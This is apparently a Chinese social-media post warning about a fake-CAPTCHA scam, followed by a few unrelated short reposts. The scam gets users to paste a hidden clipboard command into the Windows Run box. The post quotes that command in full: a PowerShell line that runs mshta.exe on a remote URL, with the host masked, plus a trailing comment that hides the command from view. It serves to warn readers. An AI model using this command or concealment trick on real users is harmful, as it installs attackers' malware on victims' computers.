现在黑产有一种新的社交工程学挂马方案。

你访问一些网站的时候，网页忽然弹出提示，让你证明自己是真人。这倒也很常见，于是你点了一下那个验证窗口，又弹出提示，让你按 Win+R，然后 Ctrl+V，再回车（图一）。

你按下 Win+R，发现弹出一个窗口。再按 Ctrl+V，窗口里出现了：✅ 'I am not a robot: CAPTCHA Verification UID: 7811'（图二）。这好像真的是在做验证。但这时只要你再按一下回车，你的电脑就会下载并执行攻击者的木马。

因为在你最开始点击那个验证窗口的时候，网站向你的剪贴板中写入的内容实际是：

powershell -w 1 -C "$l='hττps://AAAAAAAA.AAA/AAAAAA.mp4';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}" # ✅ 'I am not a robot: CAPTCHA Verification UID: 7811'

这是一条下载并执行木马的命令。因为 Win+R 弹出的那个命令执行输入框地宽度有限，对过长的输入行只显示末尾部分。攻击者精确地控制内容长度，巧妙地让你只能看到末尾那段一点都不可疑的内容。等你明白过来的时候，已经晚了。

图三显然是一个受害者。

林云的量子玫瑰在绽放 //@于三羊鲜声: 转发微博

做了个梦，梦见是对面在使坏，在忽悠，为了创造砝码。

终于有了新业务！

和所有事物一样，摇滚入华也必然接受改造，成为社会主义摇滚，简称社会摇。 🔗评论配图